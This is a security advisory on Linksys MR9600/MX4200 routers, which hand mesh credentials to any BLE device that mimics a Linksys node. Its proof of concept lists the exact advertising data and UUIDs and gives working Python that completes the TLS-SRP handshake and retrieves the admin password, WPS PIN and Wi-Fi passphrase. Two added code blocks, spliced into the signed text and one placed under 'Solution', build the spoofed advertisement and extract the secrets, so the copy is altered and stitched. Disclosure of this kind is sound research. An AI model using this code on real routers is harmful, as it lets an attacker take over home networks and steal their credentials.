-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-002
Product: MR9600, MX4200 (and potentially others)
Manufacturer: Linksys
Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
                     (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: CVE-2026-27846
Author of Advisory: Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users. The
manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Both the MR9600 and the MX4200 were tested; other models that share the
same mesh onboarding mechanism may be affected as well.

Due to missing authentication of the peer during mesh onboarding, an
attacker with physical access to the device (to press the reset button)
and a BLE device under their control can misuse the mesh functionality
to be added as a new mesh node and obtain sensitive information,
including the administrator password for the web interface and the
Wi-Fi passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides the functionality to add
other devices to the mesh network. One method to add such a device uses
a Bluetooth connection that is initiated by pressing the reset button
quickly five times. This makes the router scan for nearby Bluetooth Low
Energy (BLE) devices that advertise specific services and
characteristics. As soon as such a device is found, the router connects
to it and sends the credentials for a hidden Wi-Fi network as well as a
TLS-SRP (RFC 5054) username and password. The router does not verify
that the BLE peer is a genuine Linksys mesh node: any peripheral that
advertises the expected service and characteristics is accepted, and
the credentials are handed over without any further authentication of
the peer.
With this information, an attacker can join the hidden Wi-Fi network and
connect to a service running on TCP port 6060, which accepts a TLS-SRP
connection using the received credentials. After a binary hello message
followed by a so-called "sync request" is sent, the service answers
with sensitive configuration data, including the password for admin
access to the web interface and the Wi-Fi passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To be recognized as a Linksys mesh device over BLE, the correct data has
to be advertised. This includes the following:

- Flags: 0x06
- Manufacturer specific data: 0x5C00 0x0000
- Complete list of service class UUIDs:
  00002080-8eab-46c2-b788-0e9440016fd1
- Complete local name: Linksys

Additionally, the following service has to be present with the
specified characteristics:

Service UUID: 00002080-8eab-46c2-b788-0e9440016fd1

Characteristic 1:
  UUID: 00002081-8eab-46c2-b788-0e9440016fd1
  Properties: READ, WRITE, NOTIFY
  Permissions: READABLE, WRITABLE

Characteristic 2:
  UUID: 00002082-8eab-46c2-b788-0e9440016fd1
  Properties: READ, WRITE, NOTIFY
  Permissions: READABLE, WRITABLE

After the reset button on the MX4200 has been pressed quickly five
times, the router connects to the advertising device and writes the
data containing the SSID and passphrase of the hidden Wi-Fi network as
well as the TLS-SRP username and password into the second
characteristic.
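The advertising data listed above is a set of BLE "AD structures"
(length byte, AD type byte, payload). The following Python example,
added here as an illustration and not part of the original advisory or
of any Linksys code, encodes the four structures, splits them across
the advertising PDU and the scan response, and decodes them again to
check that a received advertisement carries everything the router
looks for. The AD type numbers are those from the Bluetooth Core
Specification Supplement; that the local name ends up in the scan
response is an assumption forced by the 31-byte limit of a legacy
advertising PDU (the four structures together need 36 bytes), the
advisory itself does not state how the data is split.

```python
import uuid

# AD types from the Bluetooth Core Specification Supplement
AD_FLAGS = 0x01
AD_COMPLETE_128BIT_UUIDS = 0x07
AD_COMPLETE_LOCAL_NAME = 0x09
AD_MANUFACTURER_DATA = 0xFF

ADV_MAX = 31  # payload limit of a legacy advertising PDU / scan response

MESH_SERVICE_UUID = "00002080-8eab-46c2-b788-0e9440016fd1"  # from the advisory


def ad_struct(ad_type, payload):
    """One AD structure: length (type byte + payload), type, payload."""
    if len(payload) + 1 > 0xFF:
        raise ValueError("AD structure payload too long")
    return bytes([len(payload) + 1, ad_type]) + bytes(payload)


def uuid128_le(text):
    """128-bit UUIDs are transmitted least-significant byte first."""
    return uuid.UUID(text).bytes[::-1]


def linksys_mesh_adv():
    """The four structures the advisory lists, in the order given there."""
    flags = ad_struct(AD_FLAGS, bytes([0x06]))
    # manufacturer data: 16-bit company identifier 0x005C little-endian,
    # followed by two zero bytes (0x5C00 0x0000 in the advisory)
    mfg = ad_struct(AD_MANUFACTURER_DATA, bytes.fromhex("5c000000"))
    svc = ad_struct(AD_COMPLETE_128BIT_UUIDS, uuid128_le(MESH_SERVICE_UUID))
    name = ad_struct(AD_COMPLETE_LOCAL_NAME, b"Linksys")
    return [flags, mfg, svc, name]


def split_adv_and_scan_rsp(structs):
    """Pack structures into the advertising PDU while they fit, spill the
    rest into the scan response (assumption: how a peripheral stack would
    fit 36 bytes of AD data into two 31-byte payloads)."""
    adv, rsp = b"", b""
    for s in structs:
        if len(adv) + len(s) <= ADV_MAX:
            adv += s
        elif len(rsp) + len(s) <= ADV_MAX:
            rsp += s
        else:
            raise ValueError("AD data does not fit into ADV + SCAN_RSP")
    return adv, rsp


def parse_ad(data):
    """Decode a raw AD payload into a list of (type, payload) tuples."""
    records, i = [], 0
    while i < len(data):
        length = data[i]
        if length == 0:  # zero-length structure terminates the payload
            break
        if i + 1 + length > len(data):
            raise ValueError("truncated AD structure")
        records.append((data[i + 1], bytes(data[i + 2:i + 1 + length])))
        i += 1 + length
    return records


def matches_linksys_mesh(records):
    """True when the decoded records (ADV plus SCAN_RSP) contain all four
    elements the advisory lists; the router's exact matching logic is not
    documented, so this is the strictest plausible check."""
    wanted = {
        (AD_FLAGS, bytes([0x06])),
        (AD_MANUFACTURER_DATA, bytes.fromhex("5c000000")),
        (AD_COMPLETE_128BIT_UUIDS, uuid128_le(MESH_SERVICE_UUID)),
        (AD_COMPLETE_LOCAL_NAME, b"Linksys"),
    }
    return wanted.issubset(set(records))


if __name__ == "__main__":
    adv, rsp = split_adv_and_scan_rsp(linksys_mesh_adv())
    print("ADV_IND  :", adv.hex(), len(adv), "bytes")
    print("SCAN_RSP :", rsp.hex(), len(rsp), "bytes")
    print("matches  :", matches_linksys_mesh(parse_ad(adv) + parse_ad(rsp)))
```

Feeding the two payloads to a peripheral stack (for example BlueZ
advertising and GATT APIs) together with the service and two
characteristics listed above is what turns a laptop or a development
board into the "mesh node" the router accepts. The decoder is also the
piece a defender would use on a sniffer capture to spot such a rogue
advertiser.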
After this data has been received and a Wi-Fi connection to the hidden
network has been established, the following Python code, which uses the
"tlslite-ng" library, connects to the service on TCP port 6060,
performs the TLS-SRP handshake with the received credentials and sends
the sync request:

import json
import socket
from tlslite.api import TLSConnection

# TLS-SRP username and password as written by the router into the
# second BLE characteristic (placeholders, fill in the received values)
srp_username = b"..."
srp_pass = b"..."

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
conn.handshakeClientSRP(srp_username, srp_pass)

# binary hello message, followed by the JSON sync request
conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))
conn.sendall('{"version": "0.1", "type": "sync_request", "client_id": "FBFA9E31-BE8C-4B63-A0BE-E89F80B304EA"}'.encode('utf8'))

# read until the service closes the connection
data = ""
msg = conn.recv(1024)
while msg:
    data = data + msg.hex()
    msg = conn.recv(1024)

# strip the 18-byte binary header and the trailing byte; the rest is JSON
data = bytes.fromhex(data[36:-2]).decode("utf8")
json_data = json.loads(data)
print(json.dumps(json_data, indent=2))

The returned data is shown in the following (excerpt):

{
  "ADMIN": {
    "syscfg": [
      {
        "device::admin_password": "AdminPassword+1"
      }
    ],
    [...]
  },
  "WLAN": {
    "syscfg": [
      {
        "device::wps_pin": "63091700"
      },
      [...]
      {
        "wl0_passphrase": "WiFiPassword"
      },
      {
        "wl0_security_mode": "wpa2-personal"
      },
      {
        "wl0_ssid": "LinksysRD"
      },
      [...]
    ],
  },
  [...]
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet. The manufacturer has stated that the
vulnerability will not receive a fix (see Disclosure Timeline).
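Returning to the sync exchange shown in the PoC section above: the
response is an 18-byte binary header, a JSON document, and one trailing
byte, and every configuration section carries its values as a "syscfg"
list of single-key objects. The following Python example, added here as
an illustration and not part of the original advisory or of any Linksys
code, builds the sync request, parses a response frame offline, and
flattens the nested structure so that the sensitive keys can be pulled
out or, on the defensive side, redacted before the dump is stored. The
sample frame is constructed: its header is 18 zero bytes because the
advisory does not document the header contents, and the JSON body is
the excerpt printed above.

```python
import json

# 18-byte hello sent by the PoC; begins with ASCII "OSCT", meaning of the
# remaining bytes is not documented in the advisory
HELLO = bytes.fromhex("4f53435479e0b43120fcf435000000600000")
HEADER_LEN = 18  # the PoC strips 36 hex digits, i.e. 18 bytes
TRAILER_LEN = 1  # and one trailing byte


def build_sync_request(client_id):
    """JSON sync request as sent by the PoC after the hello message."""
    return json.dumps({"version": "0.1", "type": "sync_request",
                       "client_id": client_id}).encode("utf8")


def parse_sync_response(raw):
    """Strip header and trailer from a complete response and decode the JSON.
    Raises on frames too short to contain both, instead of slicing into
    nonsense the way a blind data[36:-2] would."""
    if len(raw) < HEADER_LEN + TRAILER_LEN:
        raise ValueError("response shorter than header plus trailer")
    body = raw[HEADER_LEN:len(raw) - TRAILER_LEN]
    return json.loads(body.decode("utf8"))


def flatten_syscfg(sync):
    """Turn {section: {"syscfg": [{k: v}, ...]}} into {"section/k": v}."""
    flat = {}
    for section, content in sync.items():
        if not isinstance(content, dict):
            continue
        for entry in content.get("syscfg", []):
            for key, value in entry.items():
                flat[f"{section}/{key}"] = value
    return flat


# keys from the advisory's excerpt that grant access to the router or WLAN
SENSITIVE_KEYS = ("device::admin_password", "device::wps_pin", "wl0_passphrase")


def extract_secrets(sync):
    """Return only the sensitive values, keyed by their syscfg name."""
    found = {}
    for path, value in flatten_syscfg(sync).items():
        key = path.split("/", 1)[1]
        if key in SENSITIVE_KEYS:
            found[key] = value
    return found


def redact(sync):
    """Same structure with sensitive values masked, for safe storage of a dump."""
    out = {}
    for section, content in sync.items():
        if not isinstance(content, dict):
            out[section] = content
            continue
        entries = []
        for entry in content.get("syscfg", []):
            entries.append({k: ("<redacted>" if k in SENSITIVE_KEYS else v)
                            for k, v in entry.items()})
        out[section] = dict(content, syscfg=entries)
    return out


# Constructed sample response (not captured from a device): zero header,
# the JSON excerpt from the advisory, one trailer byte.
SAMPLE_SYNC = {
    "ADMIN": {"syscfg": [{"device::admin_password": "AdminPassword+1"}]},
    "WLAN": {"syscfg": [
        {"device::wps_pin": "63091700"},
        {"wl0_passphrase": "WiFiPassword"},
        {"wl0_security_mode": "wpa2-personal"},
        {"wl0_ssid": "LinksysRD"},
    ]},
}
SAMPLE_RAW = bytes(HEADER_LEN) + json.dumps(SAMPLE_SYNC).encode("utf8") + b"\x00"


if __name__ == "__main__":
    sync = parse_sync_response(SAMPLE_RAW)
    print(json.dumps(extract_secrets(sync), indent=2))
    print(json.dumps(redact(sync), indent=2))
```

In a live run, `parse_sync_response` takes the concatenated bytes the
PoC collects from `conn.recv` until the service closes the connection;
the sample frame only stands in for that so the parsing logic can be
exercised without a router.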
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Manufacturer information: vulnerability will not receive fix
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-002
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-002.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS GmbH.

E-Mail: christian.zaeske@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEUdRumzwpc0esAQ9aewDRZKMvmskFAmmezC8ACgkQewDRZKMv
msmdaxAAjzwtA45VW1PuD5XWUgpsAxeOqW68NUqWKKfnRSwfH3IVPNc3yrH2ufyd
FTvpvw33+aFN0OalVnr+ibP9A9p87x4/ltep2sQumbCoRGAE6T8eBn2LumUdJ0Bq
NWwu7ADp1ah40DsNl3pBD2Y114BnvCP1y4vOCIRDVXB8UnhNP0lldH16wHFn8CTH
f6OBqAaUo3K5t1D2XYx4MjlQ49gMsslJyK80IeSG2NWtgYz1vCGKXo6aYyccxi/N
5lj8c65vORsdcGTE82g3JeWySInqMWYD2/wBqspMtCQlSECksuU+XDhqRvyIdEMj
9cv+MYf4+J9/8/lNCiCirhRkopCqitT0l5grOGqCLVe/aKQvSaaICxGg1MIAshkr
6ZHw1js3leSJjAgg/hr/jR6lCDQnw5ZvJKXdqfBZet7Fn80Hn/rzXx63p4vvwgf3
ta932PtebKdtgLs01dNb65w5X0Sm7HalaIkwlE8s0ok6IdF+WmMFAXV++8eHWgZF
lpgDzTQcuvlcW37iJtWmZW/jvcGztvpejBLgMJeJB6zw5Ra/X7+5JnUqInaz3Wuo
c3KihqpbZFApV6y2xgzupm1tNh1139w+rtK4LhpO0dlzLS/AGDKI4bIsbkVGg3oH
Pu+rB7hIOQORYPH8cuouwxw8UWYySrSvWT031HEHN48hJ3m6X1c=
=xxpW
-----END PGP SIGNATURE-----